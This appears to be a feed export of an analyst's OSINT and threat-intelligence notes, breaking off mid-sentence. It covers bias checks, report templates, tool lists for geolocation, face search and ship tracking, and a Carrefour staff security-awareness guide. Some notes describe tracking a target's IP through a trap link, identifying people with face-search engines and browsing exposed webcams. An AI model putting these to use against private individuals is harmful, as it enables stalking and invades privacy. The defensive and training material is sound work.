ENISA Threat Landscape
tema-cti-fundamentos-doctrina ]]>projects/doctrina/roadmap-90-dias-junior.htmlProjects/doctrina/roadmap-90-dias-junior.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-figuras-doctrinales-ic ]]>projects/doctrina/entidad-robert-clark.htmlProjects/doctrina/entidad-robert-clark.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado. Seccion fuente: "G. Sesgos cognitivos a vigilar". El master sigue intacto para lectura lineal. Info Tu cerebro miente todos los días. Estos 6 sesgos son los más letales para un junior CTI. Profundiza en LISAInstitute_MPAI-A5-M1 y [[sesgos-cognitivos-analista]]. Ritual diario anti-sesgo Antes de mandar un reporte, pregúntate: "¿Qué tendría que ser cierto para que mi conclusión esté equivocada? ¿He buscado esa evidencia con la misma intensidad que la confirmatoria?" Si la respuesta es "no", retrasa 30 minutos y re-analiza. Esto es la base de Devil's Advocacy — [[entidad-devils-advocacy]].
tema-cti-fundamentos-doctrina ]]>projects/doctrina/sesgos-cognitivos-analista.htmlProjects/doctrina/sesgos-cognitivos-analista.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-figuras-doctrinales-ic ]]>projects/doctrina/entidad-sherman-kent.htmlProjects/doctrina/entidad-sherman-kent.mdTue, 28 Apr 2026 14:29:12 GMThttps://www.first.org/tlp/
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/doctrina/entidad-tlp-v2.htmlProjects/doctrina/entidad-tlp-v2.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/doctrina/entidad-wep.htmlProjects/doctrina/entidad-wep.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Specialized tools:Investigation methodology:1. Identify wallet address 2. Search in Arkham Intelligence (known labels) 3. Analyze transactions in Etherscan/Blockchain.info 4. Trace fund flow with BlockCypher 5. Check in Chainalysis if available
tema-blockchain-finint ]]>projects/finint/blockchain-crypto-investigation.htmlProjects/finint/blockchain-crypto-investigation.mdTue, 28 Apr 2026 14:29:12 GMTBlockchain.com Explorer] Transaction Patterns: [Analysis of recurring transactions, timing, and amounts] Methodology: [Description of address clustering techniques used] Clustered Addresses: [Groups of addresses believed to be controlled by the subject] Associated Entities: [Identification of any entities connected to these address clusters, e.g., exchanges, mixing services] Known Entities: [Details of known individuals or organizations linked to addresses] Service Identification: [Identification of services used, such as exchanges or wallet providers, with supporting evidence] De-Anonymization Efforts: [Summary of attempts to link anonymous addresses to real-world identities] Asset Estimation: [Estimation of total assets held across identified addresses] Source of Funds: [Analysis of fund origins, highlighting any suspicious sources] Fund Movement: [Tracking of asset transfers between addresses and entities] Regulatory Scrutiny: [Assessment against anti-money laundering (AML) and counter-financing of terrorism (CFT) standards]
Sanctions Check: [Examination of addresses against sanction lists, e.g., OFAC Sanctions List] Compliance Violations: [Identification of any breaches in regulatory compliance] Smart Contract Analysis: [For Ethereum-based transactions, analysis of associated smart contracts for vulnerabilities] Security Risks: [Assessment of security risks associated with subject’s blockchain activities] Risks Identified: [Summary of identified risks from financial, legal, and security perspectives] Monitoring Recommendations: [Suggestions for ongoing surveillance of identified addresses and transactions] Strategic Actions: [Recommended actions for law enforcement, regulatory response, or asset recovery] Appendix A: Detailed Transaction Logs Appendix B: Clustering Methodology and Results Appendix C: Legal Compliance Checklist [List of blockchain analysis tools, legal documents, and investigative resources used] {{date}}: Initial analysis and report compilation. {{date}}: Updated with new transaction data. {{date}}: Final review and strategic recommendations.
tema-blockchain-finint
tema-report-writing-cti ]]>projects/finint/reporte-ejemplo-blockchain-1.htmlProjects/finint/reporte-ejemplo-blockchain-1.mdTue, 28 Apr 2026 14:29:12 GMTBlockchain Explorer. Wallet Addresses: List and analysis of wallet addresses involved, highlighting any known associations with illicit activities. Asset Flow: Visualization of asset movement between addresses to illustrate potential money laundering or fraud schemes. Address Clustering: Techniques used to group addresses controlled by the same entity, providing a clearer picture of transactional relationships. Entity Identification: Efforts to link blockchain addresses to real-world identities, utilizing public data sources and intelligence databases. Interconnected Networks: Analysis of how the subject’s addresses connect with broader networks, indicating potential collaborators or criminal networks. Contract Analysis: If applicable, review and assessment of smart contracts related to the case, including any known vulnerabilities or exploits. DeFi Interactions: Examination of interactions with DeFi platforms, identifying any irregularities or risky transactions. Funding Sources: Analysis of where and how the subject’s assets were acquired, looking for connections to known criminal activities or unexplained wealth. Transaction Patterns: Study of transactional behavior for signs of typical laundering stages: placement, layering, and integration. Regulatory Examination: Review against compliance with AML, KYC, and CFT regulations applicable to cryptocurrency transactions.
Sanctions Check: Cross-referencing of entities and wallet addresses against global sanctions lists, e.g., OFAC’s SDN List. Vulnerabilities: Identification of security risks related to wallet storage, transaction privacy, and smart contract execution. Threat Evaluation: Assessment of potential threats from associated entities or through identified transaction patterns. Monitoring Strategies: Suggestions for ongoing surveillance of identified addresses and entities. Legal Actions: Recommended legal steps for asset recovery, injunctions, or further investigations. Security Enhancements: Proposed improvements for securing cryptocurrency assets and preventing unauthorized transactions. Appendix A: Detailed Transaction Logs Appendix B: Address Clustering Results Appendix C: Legal and Regulatory Compliance Documentation [Cryptocurrency Analysis Tools, Blockchain Explorers, Legal Documents] {{date}}: Initial analysis based on transaction data. {{date}}: Updated with results from entity linkage and clustering. {{date}}: Final review and compilation of recommendations.
tema-blockchain-finint
tema-report-writing-cti ]]>projects/finint/reporte-ejemplo-blockchain-2.htmlProjects/finint/reporte-ejemplo-blockchain-2.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Beyond basic searches:Usage methodology: Capture high-quality image Use FaceCheck.ID for social networks PimEyes for broad web search Validate results by crossing platforms
tema-geoint-completo ]]>projects/geoint/facial-recognition.htmlProjects/geoint/facial-recognition.mdTue, 28 Apr 2026 14:29:12 GMTGoogle Earth, Sentinel Hub. Key Observations: Significant findings from imagery analysis, including changes over time or unusual activities. Imagery Timestamps: Dates of the captured images used for analysis. Population Density: Overview of population distribution and density in the area.
Movement and Traffic Patterns: Analysis of human movement and vehicular traffic, utilizing sources like Strava Heatmap. Cultural and Social Landmarks: Identification of significant cultural or social gathering points. Critical Infrastructure: Details of essential structures, facilities, and utilities. Construction Activities: Overview of ongoing or planned construction projects and their implications. Service Accessibility: Assessment of access to essential services such as healthcare, education, and emergency response. Ecological Features: Examination of flora, fauna, and ecological zones. Environmental Hazards: Identification of natural or human-made environmental risks. Conservation Areas: Mapping of protected regions or significant ecological sites. Vulnerability Points: Identification of potential security weak spots based on geographical and infrastructural factors. Threat Assessment: Analysis of external or internal threats influenced by geographical characteristics. Surveillance Opportunities: Recommendations for strategic surveillance locations or methods. Land Use Planning: Suggestions for sustainable land use and development strategies. Environmental Protection: Measures for conserving natural resources and mitigating environmental hazards. Security Enhancements: Proposed security improvements based on geospatial analysis. Appendix A: Detailed Maps and Imagery Appendix B: Infrastructure and Development Documentation Appendix C: Environmental Impact Assessment Reports [Geospatial Data Repositories, Imagery Sources, Environmental Studies] {{date}}: Initial area assessment and mapping. {{date}}: Updated with latest satellite imagery analysis. {{date}}: Final review with added security and environmental recommendations.
tema-geoint-completo
tema-report-writing-cti ]]>projects/geoint/reporte-ejemplo-geoint-1.htmlProjects/geoint/reporte-ejemplo-geoint-1.mdTue, 28 Apr 2026 14:29:12 GMTGoogle Earth, Sentinel Hub. Key Observations: Insights drawn from the imagery, including changes over time or anomalies detected. Image Annotations: Detailed annotations of images highlighting areas of interest. Traffic and Logistics Routes: Analysis of major transportation routes and patterns of movement. Population Density and Distribution: Insights into population trends, density areas, and potential evacuation zones. Activity Hotspots: Identification of areas with high levels of activity, possible gatherings, or events. Natural Resources: Assessment of available natural resources and their strategic importance. Environmental Risks: Evaluation of environmental threats such as flooding, wildfires, or landslides. Conservation Areas: Information on protected areas, wildlife reserves, and ecological significance. Military Installations: Location and analysis of military facilities within or near the area. Surveillance Capabilities: Assessment of surveillance systems, checkpoints, and border controls. Vulnerability Assessment: Identification of security vulnerabilities based on geographical features and infrastructure. Communication Networks: Overview of the communication infrastructure, including cell towers and internet backbone. Energy Grids: Analysis of the energy supply network, including potential vulnerabilities. Smart City Initiatives: Review of any smart technologies or IoT deployments within the area. Strategic Risks: Evaluation of risks associated with geopolitical tensions, resource scarcity, or territorial disputes. Operational Risks: Assessment of risks to logistics, supply chains, and infrastructure stability. Environmental Risks: Analysis of environmental impacts and natural disaster preparedness. Security Enhancements: Proposals for improving physical and cyber security measures. Infrastructure Development: Suggestions for infrastructure upgrades or development projects. Environmental Protection Measures: Strategies for environmental conservation and risk mitigation. Appendix A: High-Resolution Satellite Images Appendix B: Detailed Maps of Infrastructure and Resources Appendix C: Risk Assessment Matrix [Geospatial Data Providers, Environmental Studies, Security Analysis Tools] {{date}}: Initial compilation of geospatial data and imagery. {{date}}: Updated with movement pattern analysis. {{date}}: Final review, incorporating security and environmental assessments.
tema-geoint-completo
tema-report-writing-cti ]]>projects/geoint/reporte-ejemplo-geoint-2.htmlProjects/geoint/reporte-ejemplo-geoint-2.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia.
Apify's Google Maps Scraper
ArcGIS
Atlas
Atlasify
Baidu Maps
Batchgeo
Bing Maps
CartoDB
Colorbrewer
CrowdMap
CTLRQ Address Lookup
digiKam
Dominoc925
DualMaps
Esri
Flash Earth
GeoGig
GeoInfer - Image geolocation tool, no EXIF data required.
GeoGuessr.ai - AI-powered geolocation tool for identifying locations from images.
GeoNames
Google Earth Pro
Google Earth
Google Maps
Google My Maps
GPSVisualizer
GrassGIS
Here
Hyperlapse
Inspire Geoportal
Instant Google Street View
InstantAtlas
KartaView
Kartograph
Leaflet
Liveuamap
Map Maker
MapAList
MapBox
Mapchart.net
MapChecking
Maperitive
MapHub
Mapillary
MapJam
Mapline
Mapquest
Modest Maps
NGA GEOINT
Open Street Map
OpenLayers
Perry Castaneda Library
Pic2Map
Polymaps
QGIS
QuickMaps
SAS Planet - Software used to view, download and stitch satellite images.
Satellites Pro
SatIntel
Scribble Maps
Sentinel Hub
SOAR
StoryMaps
SunCalc
Tableau
USGS (EarthExplorer)
ViaMichelin
View in Google Earth
Wikimapia
Windy
World Monitor - Real-time global intelligence platform with live conflict tracking, military flight and vessel monitoring, GPS jamming data, satellite imagery, and geopolitical risk scores across 5 specialized dashboards.
WorldMap Harvard
Worldwide OSINT Tools Map - A global map of databases and OSINT sources by applicable location.
Yahoo Maps
Zeemaps
Zoom Earth Importado desde Inbox/UBICACIONES.md durante consolidacion bulk. Herramientas para investigacion de ubicaciones fisicas y rastreo de direcciones IP. Incluye un directorio de mercadillos semanales en Espana y un servicio de rastreo de IPs mediante URLs acortadas.Geolocalizacion / Rastreo IP / Investigacion de ubicaciones. Rastrear la direccion IP de un objetivo mediante enlace trampa (IP Logger) Localizar mercadillos y actividad comercial en Espana Geolocalizar visitantes a un enlace especifico IP Logger debe usarse con precaucion y dentro del marco legal
Para geolocalizacion de IPs ver domain-ip-research
Ver metadata-extraction para extraer coordenadas GPS de imagenes Existen herramientas mas avanzadas como GeoGuessr para geolocalizacion por imagenes
tema-geoint-completo ]]>projects/geoint/geospatial-mapping.htmlProjects/geoint/geospatial-mapping.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia.
DiffChecker
EXIFEditor.io - In-browser EXIF image metadata editor, viewer, and analysis tool.
ExifLooter
ExifTool
Forensically
FotoForensics
GeoSpy - AI based image osint tool
ImgOps
ImpulseAdventure
Jeffreys Image Metadata Viewer
JIMPL - Online EXIF data viewer
JPEGsnoop
Metadata Viewer - Online EXIF data viewer.
ProfileImageIntel - Social media and WhatsApp profile image tool to find when a profile image was uploaded.
tema-geoint-completo ]]>projects/geoint/image-analysis.htmlProjects/geoint/image-analysis.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia.
Baidu Images
Betaface
Bing Images
Clarify
Dupli Checker - You can search for an image by uploading + with URL or typing the keyword or any word you want to explore related to images.
FaceCheck.ID - Facial recognition search engine.
Faceagle - Faceagle is a face recognition search engine.
Flickr
GeoSpyer - Python tool using Graylark's AI-powered geo-location service to uncover the location where photos were taken.
Google Image
Google Lens
Image Identification Project
Image Raider - is our reverse image search tool for completing individual searches. When you upload an image to this page, we'll scour the internet to find its source and all of the other pages where it has been posted.
KartaVision - search engine for KartaView imagery. It supports natural-language search and search by image
Lenso.ai - Reverse image search tool with facial recognition, created for finding people, similar images, copies of photos, identical places and more.
Lycos Image Search
PhotoBucket
PicTriev - a face search engine.
PimEyes - an online face search engine that goes through the Internet to find pictures containing given faces.
Pixsy - Take back control of your images. See where & how your images are being used online!
Search4faces - a service for searching people on the Internet by photo.
Surfface - face search and people finder indexing social profiles and public images from social media and the web.
TinEye - Reverse image search engine.
Yahoo Image Search
Yandex Images
Fuente complementaria del master osint-references-master. exiftool -a -u foto.jpg | grep -i "gps\|date\|camera" # strip before publishing exiftool -all= foto_sanitizada.jpg
Google Earth Pro → temporal displacement
Suncalc → shadow = time
Geolocation-verification
Overpass-turbo → POI within radius
FlightAware → flight tracking
FlightRadar24 → flight radar
MarineTraffic → maritime traffic
VesselFinder → ships
WiGLE → geolocated WiFi database
OpenCelliD → cell towers
Broadcastify → police audio
AviationStack → aviation API
Labs TIB Geoestimation → geographic estimation
Picarta → photo location prediction
Ventusky → weather maps
Simplex 3D → 3D maps Israel
Ukraine Live Cams → Ukraine cameras
TWN → webcam network
Opentopia → public webcams
WorldCam → world webcams
Webcam Galore → webcams
OpenTrafficCamMap → traffic cameras
KrooozCams → cruise webcams
Skyline Webcams → skyline webcams
Pictimo → world webcams
CamHacker → public webcams
Sentinel-Hub → 10m resolution, free
NASA-FIRMS → real-time fires
Zoom Earth → METAR overlay
FlightRadar24 → flight radar
ADS-B Exchange → no military filters
FlightAware → flight history
PiAware (Raspberry Pi) → own ADS-B receiver
MarineTraffic → global AIS tracking
VesselFinder → free alternative
FleetMon → fleet monitoring
ShipSpotting → ship photo database Importado desde Inbox/IMÁGENES.md durante consolidacion bulk. Catalogo de herramientas de busqueda inversa de imagenes para OSINT. Permiten encontrar el origen de una imagen, localizar perfiles asociados y verificar la autenticidad de fotografias.Analisis de imagenes / Busqueda inversa / Verificacion visual. Verificar la identidad de una persona a traves de su foto de perfil Detectar imagenes robadas o fake profiles Rastrear el origen de una fotografia viral
Complementar investigaciones de people-investigations con verificacion visual TinEye es el mejor para encontrar la primera aparicion de una imagen
Yandex (no listado aqui pero en general-search-engines) tiene la mejor busqueda inversa para caras
Ver metadata-extraction para analisis de metadatos EXIF de imagenes
Ver browsers-osint para la extension RevEye
tema-geoint-completo ]]>projects/geoint/image-search.htmlProjects/geoint/image-search.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia.
Hormuz Tracker - Real-time Strait of Hormuz vessel tracking with AIS data, dark ship detection, oil prices, and carrier positions.
VesselFinder - a FREE AIS vessel tracking web site. VesselFinder displays real time ship positions and marine traffic detected by global AIS network.
tema-geoint-completo ]]>projects/geoint/maritime-osint.htmlProjects/geoint/maritime-osint.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia.
Bing Videos
Clarify
Clip Blast
DailyMotion
Deturl - Download a YouTube video from any web page.
DownloadHelper - Download any video from any websites, it just works!
Earthcam - EarthCam is the leading network of live streaming webcams for tourism and entertainment.
Filmot - Search within YouTube subtitles. Indexing over 573 million captions across 528 million videos and 45 million channels.
Find YouTube Video - Searches currently 5 YouTube archives for specific videos by ID, which is really useful for finding deleted or private YouTube videos.
Frame by Frame - Browser plugin that allows you to watch YouTube videos frame by frame.
Geosearch
Insecam - Live cameras directory
Internet Archive: Open Source Videos
Metacafe
Metatube
Tubuep - Downloads online videos via yt-dlp, then reuploads them to the Internet Archive for preservation. Note: if you would like to archive comments too, you need to install version 0.0.33 and use the --get-comments flag, however you will still have the new yt-dlp fixes and features, but existing tubeup bugs cannot be fixed, unless you do manual work.
Veoh
Video Stabilization Methods
Vimeo
Yahoo Video Search
YouTube Geofind
YouTube Metadata
YouTube
yt-dlp - Downloads videos from almost any online platform, along with information, thumbnails, subtitles, descriptions, and comments (comments only on a select few sites like Youtube and a few small sites). If a site is not supported, or a useful or crucial piece of metadata, including comments, is missing, create an issue.
tema-geoint-completo ]]>projects/geoint/video-tools.htmlProjects/geoint/video-tools.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia. Search engines that scrape multiple sites (Google, Yahoo, Bing, Goo, etc) at the same time and return results.
Carrot2 - Organizes your search results into topics.
Zapmeta
tema-geoint-completo ]]>projects/geoint/visual-search-clustering.htmlProjects/geoint/visual-search-clustering.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo
tema-opsec-completo-analista ]]>projects/opsec/ceh-09-social-engineering.htmlProjects/opsec/ceh-09-social-engineering.mdTue, 28 Apr 2026 14:29:12 GMTtema-curso-ceh-completo
tema-opsec-completo-analista ]]>projects/opsec/ceh-12-evading-ids-firewall.htmlProjects/opsec/ceh-12-evading-ids-firewall.mdTue, 28 Apr 2026 14:29:12 GMT_@carrefour.com_ para asuntos de negocio y una cuenta privada para trámites particulares; evita almacenar documentos corporativos en discos o nubes personales —ni redirigir correos a servicios como Gmail u Outlook— y desactiva la sincronización automática de fotos si tu móvil también contiene contenido de trabajo. Así, cualquier filtración que sufras en tu esfera privada no alcanzará los activos de la compañía, y viceversa.Cuanta menos información expongas, menor será tu superficie de ataque. Aplica la contención incluso en detalles cotidianos: limita tu firma de correo a lo esencial (nombre, área y correo; sin móviles directos ni cargos exhaustivos), publica descripciones genéricas en redes (“equipo de e-commerce” en lugar de “responsable de plataforma SAP”) y, cuando te registres en servicios externos, rellena únicamente los campos obligatorios. Compartir solo lo imprescindible es la mejor barrera preventiva.Los atacantes combinan datos públicos (OSINT) con filtraciones históricas para armar un “puzzle” de la organización. Ponles difícil ese trabajo revisando la privacidad de tus perfiles: oculta listas de contactos y fechas de cumpleaños, elimina la geolocalización automática de fotos y retrasa al menos 24 horas la publicación de viajes o eventos. Para boletines, foros o pruebas de servicios, emplea un alias de correo distinto al corporativo; cada paso resta piezas a ese puzzle.“Confía, pero verifica” debe convertirse en reflejo. Incluso un remitente auténtico puede estar comprometido, de modo que antes de ejecutar pagos urgentes, cambiar números de cuenta o abrir ZIPs protegidos, confirma la petición por teléfono interno con el solicitante. Pasa siempre el ratón sobre los enlaces para comprobar la URL real, activa notificaciones de inicio de sesión en tus cuentas y revisa cualquier alerta de MFA. Esta doble comprobación corta la cadena del fraude.
La seguridad de Carrefour depende del eslabón más débil; si cada empleado mejora un pequeño porcentaje su comportamiento, el riesgo colectivo cae de forma exponencial. Reporta de inmediato cualquier indicio (un e-mail sospechoso, un portátil extraviado, un envío de información erróneo) al canal security@carrefour.com. Refuerza al equipo difundiendo estos consejos en reuniones y, cuando detectes una buena práctica en un compañero, reconócela: la cultura de seguridad se construye entre todos.El informe de vigilancia digital revela un escenario de riesgo donde un puñado de vectores concentra la mayor parte de la exposición. A continuación se detalla cada uno, con el mecanismo de explotación observado, el impacto potencial y la acción preventiva clave que debe interiorizar todo el personal.|Riesgo principal|Cómo se materializó|Impacto potencial|Acción preventiva clave||---|---|---|---||Credenciales filtradas|Malware Vidar Stealer se instaló en equipos personales sin antivirus corporativo y exfiltró contraseñas, cookies y tokens. Los datos terminaron en combolists de foros clandestinos.|1) Acceso remoto a la intranet, correo y nube.  2) Escalada lateral dentro de la red.  3) Multas RGPD si hay fuga de datos de clientes.|Activar MFA en todos los servicios y no reutilizar contraseñas entre portales personales y corporativos.||Teléfonos y correos públicos|Listas de marketing robadas y perfiles de LinkedIn expusieron mails y móviles de directivos. Los atacantes enviaron SMS y correos “urgentes” con enlaces a páginas clon.|1) Spear-phishing a VIPs.  2) Transferencias bancarias fraudulentas (“fraude del CEO”).|Reducir datos en firmas y perfiles; verificar cualquier solicitud sensible por llamada interna.||Domicilios y rutinas|Fotos de running con geotag + registros públicos de propiedad permitieron mapear residencias de ejecutivos y horarios habituales.|1) Extorsión o amenazas físicas.  2) Robo dirigido (documentación confidencial en el domicilio).|Desactivar geolocalización automática y publicar fotos de eventos tras haber regresado.||Datos bancarios (IBAN)|IBAN completo quedó almacenado en el autocompletado del navegador de un portátil personal; un stealer lo volcó a su servidor C2.|1) Cambios de cuenta de cobro no autorizados.  2) Fraudes SEPA.  3) Riesgo de blanqueo de capitales usando la cuenta.|Vaciar datos guardados del navegador y usar tarjetas/IBAN virtuales para pagos online.||Relaciones familiares|Los atacantes usaron OSINT para reconstruir árboles sociales (apellidos coincidentes, fotos etiquetadas, sociedades compartidas).|1) Ingeniería social avanzada (“suplantación de hijo/hermana”).  2) Chantaje o presión a familiares menores.|Configurar perfiles sociales en modo privado y sensibilizar al entorno cercano sobre la publicación de datos.||Tokens de sesión y cookies|Las cookies persistentes exfiltradas por el mismo malware permitieron a terceros iniciar sesión sin contraseña ni MFA.|1) Sesiones corporativas secuestradas.  2) Robo de documentación interna.|Cerrar sesión y limpiar cookies al terminar la jornada; usar navegadores endurecidos o perfiles de contenedor.||Documentos de identidad (DNI/Pasaporte)|Copias escaneadas localizadas en adjuntos de correos antiguos filtrados.|1) Apertura de líneas de crédito falsas.  2) Suplantación de identidad legal.|Cifrar y borrar escaneos tras uso; nunca enviarlos sin contraseña.||Metadatos de localización|Historias de Instagram con ubicación en tiempo real durante eventos internos.|1) Seguimiento de movimientos de personal clave.  2) Planificación de intrusión física.|Publicar sólo con retraso y sin geotag; revisar ajustes de privacidad “solo amigos”.| Credenciales + Tokens son hoy la vía más expedita de acceso: cambiar contraseñas filtradas y activar MFA reduce el riesgo en >90 %. Datos visibles en redes (móvil, cargo exacto, patrones de viaje) alimentan el spear-phishing; revisar perfiles y firmas es una tarea de cinco minutos con un retorno enorme. Huella física (domicilios, rutinas, fotos geoetiquetadas) conecta el riesgo digital con el personal; la precaución debe extenderse fuera de la oficina. A continuación se detallan las recomendaciones para cada ámbito cotidiano, con su propósito, paso a paso y ejemplo práctico. Todas las medidas son voluntarias, pero su adopción masiva reduce los vectores de riesgo identificados en el informe 06/2025.
Mantén dos entornos bien separados: el corporativo (todo lo que use tu cuenta _@carrefour.com_) y el personal (correo privado, redes sociales, banca online). Registrarte en un foro de recetas, por ejemplo, con el e-mail del trabajo solo multiplica tu exposición si esa base de datos sufre una brecha. Utiliza además alias distintos (p. ej. nombre + newsletter@dominio) cuando el servicio lo permita; así, si empiezas a recibir spam sabrás cuál de tus suscripciones ha sido comprometida. Ejemplo
Correo de trabajo: maria.quintin@carrefour.com    
Correo personal principal: mquintin@gmail.com    
Alias para cursos online: mquintin+cursos@gmail.com     No reenvíes documentos sensibles (contratos, datos de clientes) a tu buzón personal; si necesitas leer algo en casa, conéctate mediante la VPN corporativa. Activa MFA: combina contraseña con un código de aplicación autenticadora (no SMS si puedes evitarlo). Si recibes un archivo ZIP protegido con contraseña o un enlace a “WeTransfer urgente”, confirma la legitimidad con una llamada interna: los atacantes suelen usar la urgencia como palanca. Ejemplo   “Hola Laura, acabo de recibir un ZIP que dice contener las nuevas tarifas. ¿Lo has enviado tú? Prefiero comprobar antes de abrirlo”. Frases de paso largas (≥ 15 caracteres) son más memorables y resistentes que combos complejos cortos. Ej.: MitíoPepeCocinaLosDomingos es mucho más seguro que M1t!0P3. Gestor de contraseñas corporativo (p. ej. KeePassXC, Bitwarden Enterprise) permite generar claves únicas y almacenarlas cifradas. Cada vez que un servicio aparezca en Have I Been Pwned? o recibas alerta de filtración, cambia la clave incluso si no detectas actividad sospechosa. Donde la plataforma lo permita, activa biometría (huella, rostro) como factor de desbloqueo rápido sobre una clave fuerte almacenada en el dispositivo seguro. Conéctate a recursos internos solo a través de la VPN oficial; el túnel cifra tu tráfico y aplica políticas corporativas de firewall. Deshabilita el guardado automático de tarjetas y contraseñas en el navegador: usa tu gestor. Al terminar la jornada, cierra sesión en portales críticos (correo, Teams, ERP) y borra cookies de trabajo; así evitas que un token de sesión robado permita entrar sin contraseña. Tip   Configura el navegador con un perfil exclusivo “Trabajo‐Carrefour”. Al cerrarlo, configura que se eliminen cookies y caché automáticamente. El portátil corporativo ya viene cifrado; respeta los parches y reinicios solicitados por TI. Si accedes desde equipo personal (teletrabajo extraordinario mediante VPN), asegúrate de:     - Sistema operativo y navegador actualizados.    - Antivirus activo con firmas al día. Evita memorias USB desconocidas y cifra cualquier dispositivo externo antes de copiar ficheros de la empresa. Bloquea la pantalla cuando te ausentes más de 30 segundos: (Win + L en Windows, Ctrl + Shift + Power en macOS). Desactiva la geolocalización automática en fotos y publicaciones. Retrasa 24 h la difusión de viajes, eventos o reuniones (sobre todo si participas como ponente); lo relevante es compartir la experiencia, no el minuto a minuto. Ajusta la visibilidad: “solo contactos” o “amigos”, nunca “público”, para álbumes familiares o rutinas deportivas en Strava. Piensa antes de publicar: ¿este dato —cargo exacto, resultado financiero, ubicación— podría aprovecharlo un competidor o un atacante? Antes de subir una foto grupal revisa que no aparezcan credenciales colgadas, pantallas con información sensible o pasaportes abiertos. En aeropuertos y hoteles usa, si es posible, el hotspot de tu móvil en lugar de Wi-Fi abierta; si necesitas Wi-Fi pública, entra siempre por la VPN. Desactiva auto-join de redes Wi-Fi para evitar que tu equipo se conecte a un punto malicioso con el mismo nombre (Evil Twin). Clasifica los correos: Interno / Confidencial / Restringido; ante la duda, confía en el nivel superior. Nunca envíes un IBAN completo o un DNI escaneado sin cifrar (p. ej. Zip con contraseña robusta comunicada por canal aparte). Destruye físicamente papeles con datos personales: trituradora de corte cruzado o servicio de destrucción certificado. Verifica que el dominio del correo coincida con la empresa y que el número de teléfono sea el oficial publicado. Comparte ficheros mediante plataformas aprobadas (SharePoint, OneDrive corporativo, portal de proveedores) donde los accesos queden auditados. Un proveedor que solicita datos de clientes por un canal no autorizado debe redirigirse al procedimiento oficial; explica que es por protección mutua. Señales de alerta: Código MFA que no has solicitado. Sesión iniciada en país extraño. Movimiento bancario o de puntos de fidelidad no reconocido.
Ante cualquiera de estos casos, escribe inmediatamente a security@carrefour.com o abre ticket “CSI” (Corporate Security Incident). Reportar en la primera hora facilita cortar la propagación y limita sanciones RGPD o NIS 2. Dos identidades + MFA + VPN = base mínima. Gestor de contraseñas + bloqueo de pantalla + fotos sin geotag = hábitos diarios. Reportar en <1 h = protegerte a ti y a toda la compañía. Con estas prácticas no solo blindamos los puntos débiles detectados, sino que alineamos nuestras rutinas con las exigencias de DORA y NIS 2 sobre resiliencia operativa y seguridad de la información.|#|Pregunta de control|Vector que neutraliza|Cómo ponerle remedio tú mismo||---|---|---|---||1|¿He activado MFA en todas mis cuentas?|Ataques de credential-stuffing y phishing con contraseñas filtradas.|Ajustes → Seguridad → “Aplicación autenticadora” (Microsoft/Google); evita SMS si hay opción app.||2|¿Uso un gestor de contraseñas corporativo?|Reutilización de claves y contraseñas débiles.|Instala la extensión oficial (Bitwarden/KeePassXC); genera claves únicas ≥ 20 caracteres.||3|¿Publicaría esta foto si fuera un atacante?|Ingeniería social por geotags, credenciales visibles, logos.|Haz pausa de seguridad: sin ubicación, sin credencial a la vista, publícala 24 h después.||4|¿Mis documentos confidenciales están cifrados o destruidos?|Robo de info en dispositivos perdidos y fugas de papel.|ZIP AES-256 o “Cifrar con contraseña” en Office; usa destructora corte-cruzado para papel.||5|¿Accedo siempre vía VPN y con antivirus actualizado?|Intercepción en Wi-Fi pública y malware.|Activa VPN corporativa antes de usar correo/ERP; verifica que el antivirus esté actualizado al día.||6|¿He revisado mis contactos de redes sociales este trimestre?|Perfiles falsos que espían publicaciones internas.|Elimina contactos dudosos; oculta tu lista de conexiones (“solo yo”).|
|7|¿Informo al canal de seguridad ante actividad inusual?|Persistencia del atacante por falta de alertas tempranas.|Reenvía e-mails sospechosos a security@carrefour.com en < 30 min; guarda el contacto en favoritos.||8|¿Tengo sistema operativo y aplicaciones al día?|Explotación de vulnerabilidades conocidas.|Activa actualizaciones automáticas; reinicia cuando lo pida TI.||9|¿Bloqueo la pantalla al alejarme del dispositivo?|Acceso físico no autorizado, robo de sesión.|Windows + L ó Ctrl + Shift + Power en Mac; fija bloqueo automático a 2 min.||10|¿Uso solo memorias USB cifradas o aprobadas?|Infección por malware y pérdida de datos en soportes extraíbles.|Utiliza USB con cifrado hardware o BitLocker/Veracrypt; evita unidades promocionales.||11|¿He desactivado el autocompletado de tarjetas/contraseñas en el navegador?|Robo de datos financieros y credenciales vía stealer.|Ajustes → Privacidad → desmarcar “Guardar métodos de pago” y “Recordar contraseñas”.||12|¿Reviso periódicamente las apps con acceso a mis cuentas (OAuth)?|Secuestro de tokens de sesión persistentes.|Google/Microsoft/LinkedIn → “Aplicaciones y sesiones” → Revocar las que no reconozcas.||13|¿Mantengo la geolocalización desactivada salvo cuando la necesito?|Seguimiento de rutinas y ataques físicos.|Ajustes móvil → Ubicación → Permitir “Solo al usar”; desactiva “Permitir siempre”.||14|¿He configurado la privacidad de mis publicaciones familiares?|Ingeniería social dirigida a hijos o pareja.|Facebook/Instagram → Audiencia → “Amigos” o lista restringida; evita “Público”.||15|¿Vacío con frecuencia la papelera del correo y del gestor de archivos?|Recuperación de documentos sensibles “borrados”.|Programa limpieza semanal y usa “Eliminar definitivamente” para ficheros con PII.| Separar estrictamente correos y credenciales entre uso corporativo y 